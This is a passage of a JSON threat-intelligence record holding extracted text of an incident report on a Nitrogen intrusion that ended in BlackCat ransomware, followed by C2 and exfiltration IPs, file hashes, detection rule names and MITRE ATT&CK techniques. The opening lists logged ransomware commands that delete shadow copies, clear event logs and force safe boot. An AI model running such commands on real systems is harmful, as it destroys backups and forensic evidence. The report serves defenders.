\"cmd\" /c \"bcdedit /set {current} safeboot network\"\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\example.exe --safeboot-instance --access-token REDACTED --p\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"C:\\Windows\\TEMP\\2-REDACTED-51.exe --safeboot-instance --access\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Sa\r\n--------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"sc delete 15991160457623399845550968347370640942\"\r\n--------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"bcdedit /deletevalue {current} safeboot\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wmic csproduct get UUID\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"iisreset.exe /stop\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Servic\r\n------------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"vssadmin.exe Delete Shadows /all /quiet\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"arp -a\"\r\n------------\u003e C:\\Windows\\System32\\cmd.exe \"cmd\" /c \"wmic.exe Shadowcopy Delete\"\r\n------------\u003e C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wevtutil.exe el\"\r\n------------\u003e 
C:\\Windows\\SysWOW64\\cmd.exe \"cmd\" /c \"wevtutil.exe cl \u003cMULTIPLE EVENT LOGS\u003e (Executed hundreds o\r\nThe threat actor executed the binary example.exe which configured the ransomware, cleared logs and deleted volume\r\nshadow copies.\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 29 of 37\n\nThe ransomware options were dissected in Netscope’s BlackCat Ransomware: Tactics and Techniques From a Targeted\r\nAttack blog post.\r\nUpon the execution of these utilities, the binary started encrypting files and dropping the ransom note:\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 30 of 37\n\nTimeline\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 31 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 32 of 37\n\nDiamond Model\r\nIndicators\r\nAtomic\r\nSliver\r\n194.49.94[.]18:8443\r\n194.169.175[.]134:8443\r\nCobalt Strike\r\n91.92.250[.]60:443\r\n91.92.250[.]65:443\r\nStaging Tool Server\r\n91.92.245[.]26:443\r\nExfiltration 
Server\r\n195.123.226[.]84:8000\r\nComputed\r\nVersion.zip\r\nDBF5F56998705C37076B6CAE5D0BFB4D\r\nE6AB3C595AC703AFD94618D1CA1B8EBCE623B21F\r\n5DC8B08C7E1B11ABF2B6B311CD7E411DB16A7C3827879C6F93BD0DAC7A71D321\r\nwo14.py\r\nEB64862F1C8464CA3D03CF0A4AC608F4\r\n6F43E6388B64998B7AA7411104B955A8949C4C63\r\n726F038C13E4C90976811B462E6D21E10E05F7C11E35331D314C546D91FA6D21\r\nworksliv.py\r\n3A4FDBC642A24A240692F9CA70757E9F\r\n794203A4E18F904F0D244C7B3C2F5126B58F6A21\r\n5F7D438945306BF8A7F35CAB0E2ACC80CDC9295A57798D8165EF6D8B86FBB38D\r\nslv.py\r\n7A4CB8261036F35FD273DA420BF0FD5E\r\n9648559769179677C5B58D5619CA8872F5086312\r\n4EF1009923FC12C2A3127C929E0AA4515C9F4D068737389AFB3464C28CCF5925\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 33 of 37\n\nwork.aes\r\n1BE7FE8E20F8E9FDC6FD6100DCAD38F3\r\nC4CDE794CF4A68D63617458A60BC8B90D99823CA\r\n4EE4E1E2CEDF59A802C01FAE9CCFCFDE3E84764C72E7D95B97992ADDD6EDF527\r\ndata.aes\r\n4232C065029EB52D1B4596A08568E800\r\n79818110ABD52BA14800CDFF39ECA3252412B232\r\n3298629DE0489C12E451152E787D294753515855DBF1CE80BFCDED584A84AC62\r\nservice_probes\r\n637FB65A1755C4B6DC1E0428E69B634E\r\nFBA4652B6DBE0948D4DADCEBF51737A738CA9E67\r\nB3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6\r\nUpdateEG.bat\r\n0B1882F719504799B3211BF73DFDC253\r\n448892D5607124FDD520F62FF0BC972DF801C046\r\n39EC2834494F384028AD17296F70ED6608808084EF403714CFBC1BFBBED263D4\r\npython311.dll\r\nE20FC97E364E859A2FB58D66BC2A1D05\r\nF5F56413F81E8F4A941F53E42A90BA1720823F15\r\n9514035FEA8000A664799E369AE6D3AF6ABFE8E5CDA23CDAFBEDE83051692E63\r\nexample.exe\r\nC737A137B66138371133404C38716741\r\nA3E4FB487400D99E3A9F3523AEAA9AF5CF6E128B\r\n25172A046821BD04E74C15DC180572288C67FDFF474BDB5EB11B76DCE1B3DAD3\r\n2-REDACTED-51.exe\r\n7A1E7F652055C812644AD240C41D904A\r\nB39C244C3117F516CE5844B2A843EFF1E839207C\r\n5FAC60F1E97B6EAAE18EBD8B49B912C86233CF77637590F36AA319651582D3C4\r\ndomain_name.exe\r\nE0D1CF0ABD09D7632F79A
8259283288D\r\n3A78CE27A7AA16A8230668C644C7DF308DE6CF33\r\nD15CAB3901E9A10AF772A0A1BDBF35B357EE121413D4CF542D96819DC4471158\r\nDetections\r\nNetwork\r\nETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response\r\nET USER_AGENTS Go HTTP Client User-Agent\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET POLICY PsExec service created\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY Command Shell Activity Over SMB - Possible Lateral Movement\r\nET POLICY Powershell Activity Over SMB - Likely Lateral Movement\r\nET POLICY SMB2 NT Create AndX Request For a .bat File\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET INFO Suspected Impacket WMIExec Activity\r\nET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check\r\nETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)\r\nSigma\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 34 of 37\n\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\nDFIR Private Rules:\r\n934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT\r\n181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory\r\n6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution\r\nd2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value\r\n3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value\r\n2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse\r\nSigma Repo:\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via 
Nltest.EXE\r\n968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity\r\n8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File\r\n526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE\r\n7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools\r\n42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation\r\n8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2\r\n192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt\r\nd7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility\r\ncc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity\r\nc947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities\r\ndcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/25590/25590.yar\r\nExternal Rules:\r\nMITRE ATT\u0026CK\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 35 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 36 of 37\n\nAccount Manipulation - T1098\r\nClear Windows Event Logs - T1070.001\r\nData Encrypted for Impact - T1486\r\nData from Network Shared Drive - T1039\r\nDLL Side-Loading - T1574.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nDrive-by Compromise - T1189\r\nDynamic-link Library Injection - T1055.001\r\nEncrypted/Encoded File - T1027.013\r\nExfiltration Over Alternative Protocol - T1048\r\nIngress Tool Transfer - T1105\r\nInhibit System Recovery - T1490\r\nLateral Tool Transfer - T1570\r\nLocal Account - T1087.001\r\nLocal Groups - T1069.001\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerading - T1036\r\nMatch Legitimate Name or Location - T1036.005\r\nNetwork Share Discovery - 
T1135\r\nPowerShell - T1059.001\r\nProcess Injection - T1055\r\nPython - T1059.006\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nSafe Mode Boot - T1562.009\r\nScheduled Task - T1053.005\r\nService Execution - T1569.002\r\nSMB/Windows Admin Shares - T1021.002\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nWinlogon Helper DLL - T1547.004\r\nInternal case #TB25590 #PR32467\r\nSource: https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\r\nPage 37 of 37\n\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/    \nSubsequently, the Sliver DLL is injected in memory and the DLL entrypoint is called.\n  Page 6 of 37",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/"
	],
	"report_names": [
		"nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434077,
	"ts_updated_at": 1775826732,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.pdf",
		"text": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.txt",
		"img": "https://archive.orkl.eu/2d2b97a37fe5e90dcb511358ef5c177899f5f5f1.jpg"
	}
}